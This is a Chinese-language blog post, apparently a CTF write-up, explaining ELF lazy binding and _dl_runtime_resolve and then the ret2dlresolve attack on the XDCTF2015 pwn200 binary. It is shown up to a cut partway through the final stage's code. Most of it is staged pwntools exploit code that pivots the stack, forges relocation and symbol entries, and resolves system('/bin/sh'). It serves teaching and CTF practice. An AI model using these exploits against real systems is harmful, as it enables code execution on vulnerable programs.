                <time title="Modified: 2020-04-10 09:14:38" itemprop="dateModified" datetime="2020-04-10T09:14:38+08:00">2020-04-10</time>
              </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/04/08/ret2dl/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/04/08/ret2dl/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="dl-runtime-resolve"><a href="#dl-runtime-resolve" class="headerlink" title="_dl_runtime_resolve"></a>_dl_runtime_resolve</h1><p>这个应该说是一个很久远的坑了，算是给自己补补基础吧，也是查漏补缺23333，也顺带复习一下延迟绑定</p>
<p>写了一个程序自己调试程序调用_dl_runtime_resolve的过程</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"hello world"</span>);</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"hello world twice"</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="第一次调用puts"><a href="#第一次调用puts" class="headerlink" title="第一次调用puts"></a>第一次调用puts</h2><img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/1579182750270.png" alt="1579182750270" style="zoom:80%;">

<p>直接call程序的plt段，plt段是一个是一个类似 jmp [GOT表] 的结构，此时的第一次调用的GOT项&lt;0x804a00c&gt;存放着一个0x08048306的plt段地址，如下所示</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/1579182851280.png" alt="1579182851280" style="zoom:80%;">

<p>这个地方入栈了一个0，然后跳到0x80482f0 再入栈一个[0x804a004] (link_map)然后调用_dl_runtime_resolve函数来调用我们要用的函数</p>
<p>这个resolve函数一共是两个参数，这两个参数分别是一个link_map的指针和puts在ELF JMPREL Relocation Table中的偏移，示意如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_dl_runtime_resolve(link_map, rel_offset)</span><br></pre></td></tr></table></figure>

<p>其中ELF JMPREL Relocation Table中如下所示+0即为puts函数的偏移（64位的话就是index）</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/1579183036345.png" alt="1579183036345" style="zoom:80%;">

<p>第一个参数&amp;link_map如下所示，第三个数是.dynamic段的地址</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/1579183162193.png" alt="1579183162193" style="zoom:80%;">

<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/1579183223982.png" alt="1579183223982" style="zoom:80%;">

<p>主要注意观察这三个</p>
<p>这里介绍两个结构体</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span>//<span class="title">Elf32_Sym</span> 不过这里我没有给<span class="title">Symbol</span> <span class="title">Table</span>的截图</span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  Elf32_Word    st_name; <span class="comment">//dd 符号名，是相对.dynstr起始的偏移</span></span><br><span class="line">  Elf32_Addr    st_value;<span class="comment">//dd</span></span><br><span class="line">  Elf32_Word    st_size; <span class="comment">//dd</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">char</span> st_info; <span class="comment">//db 对于导入函数符号而言，它是0x12</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">char</span> st_other;<span class="comment">//db</span></span><br><span class="line">  Elf32_Section st_shndx;<span class="comment">//dw</span></span><br><span class="line">&#125;	Elf32_Sym; <span class="comment">//对于导入函数符号而言，其他字段都是0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span>//<span class="title">Elf32_Rel</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  Elf32_Addr    r_offset; <span class="comment">//dd 指向GOT表的指针</span></span><br><span class="line">  Elf32_Word    r_info;   <span class="comment">//dd</span></span><br><span class="line">  <span class="comment">// 一些关于导入符号的信息，我们只关心从第二个字节开始的值((val)&gt;&gt;8)，忽略那个07</span></span><br><span class="line">&#125; Elf32_Rel;</span><br></pre></td></tr></table></figure>



<h2 id="dl-runtime-resolve具体步骤"><a href="#dl-runtime-resolve具体步骤" class="headerlink" title="_dl_runtime_resolve具体步骤"></a>_dl_runtime_resolve具体步骤</h2><ol>
<li>用<strong>link_map</strong>访问.dynamic，取出<strong>.dynstr, .dynsym, .rel.plt(存放Elf32_Rel处)</strong> 的指针</li>
<li>.rel.plt + 传入的<strong>第二个参数</strong>求出当前函数的重定位表项<strong>Elf32_Rel的指针</strong>，记作rel</li>
<li>rel-&gt;r_info &gt;&gt; 8作为.dynsym的<strong>下标</strong>，求出当前函数的符号表项Elf32_Sym的指针，记作sym</li>
<li>.dynstr + sym-&gt;st_name得出符号<strong>名字符串指针</strong></li>
<li>在动态链接库查找这个函数的地址，并且把地址赋值给*rel-&gt;r_offset，即GOT表</li>
<li>调用这个函数</li>
</ol>
<p>大致有这么一张图</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20200406224128730.png" alt="image-20200406224128730" style="zoom:80%;">

<h2 id="第二次调用puts"><a href="#第二次调用puts" class="headerlink" title="第二次调用puts"></a>第二次调用puts</h2><img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/1579183405159.png" alt="1579183405159" style="zoom:80%;">

<p>可以看到此时got表已经被改成了puts函数的地址，所以第二次是直接调用</p>
<h2 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">_dl_fixup(struct link_map *l, ElfW(Word) reloc_arg)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 首先通过参数reloc_arg计算重定位入口，这里的JMPREL即.rel.plt，reloc_offset即reloc_arg</span></span><br><span class="line">    <span class="keyword">const</span> PLTREL *<span class="keyword">const</span> reloc = (<span class="keyword">const</span> <span class="keyword">void</span> *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);</span><br><span class="line">    <span class="comment">// 然后通过reloc-&gt;r_info找到.dynsym中对应的条目</span></span><br><span class="line">    <span class="function"><span class="keyword">const</span> <span class="title">ElfW</span><span class="params">(Sym)</span> *sym </span>= &amp;symtab[ELFW(R_SYM) (reloc-&gt;r_info)];</span><br><span class="line">    <span class="comment">// 这里还会检查reloc-&gt;r_info的最低位是不是R_386_JUMP_SLOT=7</span></span><br><span class="line">    assert (ELFW(R_TYPE)(reloc-&gt;r_info) == ELF_MACHINE_JMP_SLOT);</span><br><span class="line">    <span class="comment">// 接着通过strtab+sym-&gt;st_name找到符号表字符串，result为libc基地址</span></span><br><span class="line">    result = _dl_lookup_symbol_x (strtab + sym-&gt;st_name, l, &amp;sym, l-&gt;l_scope, version, ELF_RTYPE_CLASS_PLT, flags, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="comment">// value为libc基址加上要解析函数的偏移地址，也即实际地址</span></span><br><span class="line">    value = DL_FIXUP_MAKE_VALUE (result, sym ? (LOOKUP_VALUE_ADDRESS (result) + sym-&gt;st_value) : <span class="number">0</span>);</span><br><span class="line">    <span class="comment">// 最后把value写入相应的GOT表条目中</span></span><br><span class="line">    <span class="keyword">return</span> elf_machine_fixup_plt (l, result, reloc, rel_addr, value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h1 id="ret2dl"><a href="#ret2dl" class="headerlink" title="ret2dl"></a>ret2dl</h1><p>这个攻击更适于一些比较简单的栈溢出的情况，但同时又难以泄露获取更多信息的情况下</p>
<p>可用方式：</p>
<ol>
<li>控制程序执行dl_resolve函数<ul>
<li>给定Link_map以及index两个参数。</li>
<li>当然我们可以直接给定 plt[0]对应的汇编代码，这时，我们就只需要一个index就足够了。</li>
</ul>
</li>
<li>控制index的大小，以便于指向自己所控制的区域，从而伪造一个指定的重定位表项。</li>
<li>伪造重定位表项，使得重定位表项所指的符号也在自己可以控制的范围内。</li>
<li>伪造符号内容，使得符号对应的名称也在自己可以控制的范围内</li>
</ol>
<h1 id="XDCTF2015-pwn200"><a href="#XDCTF2015-pwn200" class="headerlink" title="XDCTF2015-pwn200"></a>XDCTF2015-pwn200</h1><img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20200406232708454.png" alt="image-20200406232708454" style="zoom:80%;">

<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20200406232720644.png" alt="image-20200406232720644" style="zoom:80%;">

<p>程序的逻辑很简单，其中最主要的是下面的read栈溢出</p>
<p>为了来一步步学习ret2dl，就照着师傅的博客一步步来</p>
<h2 id="stage1"><a href="#stage1" class="headerlink" title="stage1"></a>stage1</h2><p>stage是通过一个栈迁移的运用来打印我们读入的字符串<code>/bin/sh</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'pwn200'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.terminal = [<span class="string">'tmux'</span>, <span class="string">'splitw'</span>, <span class="string">'-h'</span>]</span><br><span class="line"></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span>, stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\x00'</span>))</span><br><span class="line">my_u32 = <span class="keyword">lambda</span> x: u32(x.ljust(<span class="number">4</span>, <span class="string">'\x00'</span>))</span><br><span class="line">global_max_fast=<span class="number">0x3c67f8</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">loginfo</span><span class="params">(what=<span class="string">''</span>,address=<span class="number">0</span>)</span>:</span></span><br><span class="line">	log.info(<span class="string">"\033[1;36m"</span> + what + <span class="string">'-----&gt;'</span> + hex(address) + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># todo here</span></span><br><span class="line">ppp_ret = <span class="number">0x0804856c</span></span><br><span class="line">pop_ebp_ret = <span class="number">0x08048453</span></span><br><span class="line">leave_ret = <span class="number">0x08048481</span></span><br><span class="line"></span><br><span class="line">stack_size = <span class="number">0x800</span></span><br><span class="line">bss_addr = <span class="number">0x0804A020</span> <span class="comment"># readelf -S bof | grep ".bss"</span></span><br><span class="line">base_stage = bss_addr + stack_size</span><br><span class="line"></span><br><span class="line">read_plt=<span class="number">0x08048390</span></span><br><span class="line">write_plt=<span class="number">0x080483C0</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">0x08048453 : pop ebp ; ret</span></span><br><span class="line"><span class="string">0x08048452 : pop ebx ; pop ebp ; ret</span></span><br><span class="line"><span class="string">0x0804856c : pop ebx ; pop edi ; pop ebp ; ret</span></span><br><span class="line"><span class="string">0x080485cc : pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span></span><br><span class="line"><span class="string">0x0804836c : pop ebx ; ret</span></span><br><span class="line"><span class="string">0x0804856d : pop edi ; pop ebp ; ret</span></span><br><span class="line"><span class="string">0x080485cd : pop esi ; pop edi ; pop ebp ; ret</span></span><br><span class="line"><span class="string">0x0804834b : ret</span></span><br><span class="line"><span class="string">0x08048532 : ret 0xb8</span></span><br><span class="line"><span class="string">0x08048481 : leave ; ret</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">p.recvuntil(<span class="string">'Welcome to XDCTF2015~!\n'</span>)</span><br><span class="line">payload = <span class="string">'A'</span> * <span class="number">0x70</span></span><br><span class="line">payload += p32(read_plt) <span class="comment"># 读100个字节到base_stage 这里栈是先读再迁移</span></span><br><span class="line">payload += p32(ppp_ret) <span class="comment">#清除参数</span></span><br><span class="line">payload += p32(<span class="number">0</span>)</span><br><span class="line">payload += p32(base_stage)</span><br><span class="line">payload += p32(<span class="number">100</span>)</span><br><span class="line">payload += p32(pop_ebp_ret) <span class="comment"># 把base_stage pop到ebp中</span></span><br><span class="line">payload += p32(base_stage)</span><br><span class="line">payload += p32(leave_ret) <span class="comment"># mov esp, ebp ; pop ebp ;将esp指向base_stage</span></span><br><span class="line">raw_input()</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">cmd = <span class="string">"/bin/sh"</span></span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">'AAAA'</span> <span class="comment"># 接上一个payload的leave-&gt;pop ebp ; ret</span></span><br><span class="line">payload2 += p32(write_plt)</span><br><span class="line">payload2 += <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(<span class="number">1</span>)</span><br><span class="line">payload2 += p32(base_stage + <span class="number">80</span>)</span><br><span class="line">payload2 += p32(len(cmd))</span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">80</span> - len(payload2)) <span class="comment"># pad</span></span><br><span class="line">payload2 += cmd + <span class="string">'\x00'</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">100</span> - len(payload2))</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="stage2"><a href="#stage2" class="headerlink" title="stage2"></a>stage2</h2><p>这里修改了payload2，使其成为利用plt[0]+fake_index的方法来打印<code>/bin/sh</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">cmd = <span class="string">"/bin/sh"</span></span><br><span class="line"></span><br><span class="line">plt_0 = <span class="number">0x08048370</span> </span><br><span class="line">index_offset = <span class="number">0x20</span> <span class="comment"># write's index</span></span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">'AAAA'</span> <span class="comment"># for pop ebp</span></span><br><span class="line">payload2 += p32(plt_0) </span><br><span class="line">payload2 += p32(index_offset) <span class="comment">#fake index</span></span><br><span class="line">payload2 += <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(<span class="number">1</span>)</span><br><span class="line">payload2 += p32(base_stage + <span class="number">80</span>)</span><br><span class="line">payload2 += p32(len(cmd))</span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">80</span> - len(payload2))</span><br><span class="line">payload2 += cmd + <span class="string">'\x00'</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">100</span> - len(payload2))</span><br><span class="line">p.sendline(payload2)</span><br></pre></td></tr></table></figure>

<h2 id="stage3"><a href="#stage3" class="headerlink" title="stage3"></a>stage3</h2><p>这次是利用一个fake <code>Elf32_Rel</code>，和fake offset来实现write的调用 offset就是通过<code>fake_reloc-rel_plt</code>的偏移计算出来的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">cmd = <span class="string">"/bin/sh"</span></span><br><span class="line">plt_0 = <span class="number">0x08048370</span></span><br><span class="line">rel_plt = <span class="number">0x08048318</span></span><br><span class="line">index_offset = (base_stage + <span class="number">28</span>) - rel_plt <span class="comment"># base_stage + 28指向fake_reloc，减去rel_plt即偏移</span></span><br><span class="line">write_got = elf.got[<span class="string">'write'</span>]</span><br><span class="line">r_info = <span class="number">0x507</span> <span class="comment"># write: Elf32_Rel-&gt;r_info</span></span><br><span class="line">fake_reloc = p32(write_got) + p32(r_info)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(plt_0)</span><br><span class="line">payload2 += p32(index_offset)</span><br><span class="line">payload2 += <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(<span class="number">1</span>)</span><br><span class="line">payload2 += p32(base_stage + <span class="number">80</span>)</span><br><span class="line">payload2 += p32(len(cmd))</span><br><span class="line">payload2 += fake_reloc <span class="comment"># (base_stage+28)的位置</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">80</span> - len(payload2))</span><br><span class="line">payload2 += cmd + <span class="string">'\x00'</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">100</span> - len(payload2))</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="stage4"><a href="#stage4" class="headerlink" title="stage4"></a>stage4</h2><p>此时伪造了一个<code>Elf32_Sym</code>结构体还有fake r_info，至此我们已经可以劫持构造Elf32_Rel还有Elf32_sym了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">cmd = <span class="string">"/bin/sh"</span></span><br><span class="line">plt_0 = <span class="number">0x08048370</span></span><br><span class="line">rel_plt = <span class="number">0x08048318</span></span><br><span class="line">index_offset = (base_stage + <span class="number">28</span>) - rel_plt</span><br><span class="line">write_got = elf.got[<span class="string">'write'</span>]</span><br><span class="line">dynsym = <span class="number">0x080481D8</span></span><br><span class="line">dynstr = <span class="number">0x08048268</span></span><br><span class="line">fake_sym_addr = base_stage + <span class="number">36</span></span><br><span class="line">align = <span class="number">0x10</span> - ((fake_sym_addr - dynsym) &amp; <span class="number">0xf</span>) <span class="comment"># 这里的对齐操作是因为dynsym里的Elf32_Sym结构体都是0x10字节大小</span></span><br><span class="line">fake_sym_addr = fake_sym_addr + align</span><br><span class="line">index_dynsym = (fake_sym_addr - dynsym) / <span class="number">0x10</span> <span class="comment"># 除以0x10因为Elf32_Sym结构体的大小为0x10，得到write的dynsym索引号</span></span><br><span class="line">r_info = (index_dynsym &lt;&lt; <span class="number">8</span>) | <span class="number">0x7</span></span><br><span class="line">fake_reloc = p32(write_got) + p32(r_info)</span><br><span class="line">st_name = <span class="number">0x54</span></span><br><span class="line">fake_sym = p32(st_name) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(<span class="number">0x12</span>)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(plt_0)</span><br><span class="line">payload2 += p32(index_offset)</span><br><span class="line">payload2 += <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(<span class="number">1</span>)</span><br><span class="line">payload2 += p32(base_stage + <span class="number">80</span>)</span><br><span class="line">payload2 += p32(len(cmd))</span><br><span class="line">payload2 += fake_reloc <span class="comment"># (base_stage+28)的位置</span></span><br><span class="line">payload2 += <span class="string">'B'</span> * align <span class="comment">#算出要对齐的字节数</span></span><br><span class="line">payload2 += fake_sym <span class="comment"># (base_stage+36)的位置</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">80</span> - len(payload2))</span><br><span class="line">payload2 += cmd + <span class="string">'\x00'</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">100</span> - len(payload2))</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="stage5"><a href="#stage5" class="headerlink" title="stage5"></a>stage5</h2><p>前面我们写了<code>st_name = 0x54</code>，指向的是string table中的<code>write</code>字符串</p>
<p>然后我们把他修改成我们输入的<code>write</code>字符串</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">cmd = <span class="string">"/bin/sh"</span></span><br><span class="line">plt_0 = <span class="number">0x08048370</span></span><br><span class="line">rel_plt = <span class="number">0x08048318</span></span><br><span class="line">index_offset = (base_stage + <span class="number">28</span>) - rel_plt</span><br><span class="line">write_got = elf.got[<span class="string">'write'</span>]</span><br><span class="line">dynsym = <span class="number">0x080481D8</span></span><br><span class="line">dynstr = <span class="number">0x08048268</span></span><br><span class="line">fake_sym_addr = base_stage + <span class="number">36</span></span><br><span class="line">align = <span class="number">0x10</span> - ((fake_sym_addr - dynsym) &amp; <span class="number">0xf</span>)</span><br><span class="line">fake_sym_addr = fake_sym_addr + align</span><br><span class="line">index_dynsym = (fake_sym_addr - dynsym) / <span class="number">0x10</span></span><br><span class="line">r_info = (index_dynsym &lt;&lt; <span class="number">8</span>) | <span class="number">0x7</span></span><br><span class="line">fake_reloc = p32(write_got) + p32(r_info)</span><br><span class="line">st_name = (fake_sym_addr + <span class="number">0x10</span>) - dynstr <span class="comment"># 加0x10因为Elf32_Sym的大小为0x10</span></span><br><span class="line">fake_sym = p32(st_name) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(<span class="number">0x12</span>)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(plt_0)</span><br><span class="line">payload2 += p32(index_offset)</span><br><span class="line">payload2 += <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(<span class="number">1</span>)</span><br><span class="line">payload2 += p32(base_stage + <span class="number">80</span>)</span><br><span class="line">payload2 += p32(len(cmd))</span><br><span class="line">payload2 += fake_reloc <span class="comment"># (base_stage+28)的位置</span></span><br><span class="line">payload2 += <span class="string">'B'</span> * align</span><br><span class="line">payload2 += fake_sym <span class="comment"># (base_stage+36)的位置</span></span><br><span class="line">payload2 += <span class="string">"write\x00"</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">80</span> - len(payload2))</span><br><span class="line">payload2 += cmd + <span class="string">'\x00'</span></span><br><span class="line">payload2 += <span class="string">'A'</span> * (<span class="number">100</span> - len(payload2))</span><br><span class="line">r.sendline(payload2)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="stage6"><a href="#stage6" class="headerlink" title="stage6"></a>stage6</h2><p>上一步我们用输入的write实现了调用，这一步直接改成system不就是getshell了吗</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">cmd = <span class="string">"/bin/sh"</span></span><br><span class="line">plt_0 = <span class="number">0x08048380</span></span><br><span class="line">rel_plt = <span class="number">0x08048330</span></span><br><span class="line">index_offset = (base_stage + <span class="number">28</span>) - rel_plt</span><br><span class="line">write_got = elf.got[<span class="string">'write'</span>]</span><br><span class="line">dynsym = <span class="number">0x080481d8</span></span><br><span class="line">dynstr = <span class="number">0x08048278</span></span><br><span class="line">fake_sym_addr = base_stage + <span class="number">36</span></span><br><span class="line">align = <span class="number">0x10</span> - ((fake_sym_addr - dynsym) &amp; <span class="number">0xf</span>)</span><br><span class="line">fake_sym_addr = fake_sym_addr + align</span><br><span class="line">index_dynsym = (fake_sym_addr - dynsym) / <span class="number">0x10</span></span><br><span class="line">r_info = (index_dynsym &lt;&lt; <span class="number">8</span>) | <span class="number">0x7</span></span><br><span class="line">fake_reloc = p32(write_got) + p32(r_info)</span><br><span class="line">st_name = (fake_sym_addr + <span class="number">0x10</span>) - dynstr</span><br><span class="line">fake_sym = p32(st_name) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(<span class="number">0x12</span>)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(plt_0)</span><br><span class="line">payload2 += p32(index_offset)</span><br><span class="line">payload2 += <span class="string">'AAAA'</span></span><br><span class="line">payload2 += p32(base_stage + <span class="number">80</span>)</span><br><span class="line">payload2 += <span class="string">'aaaa'</span></span><br><span 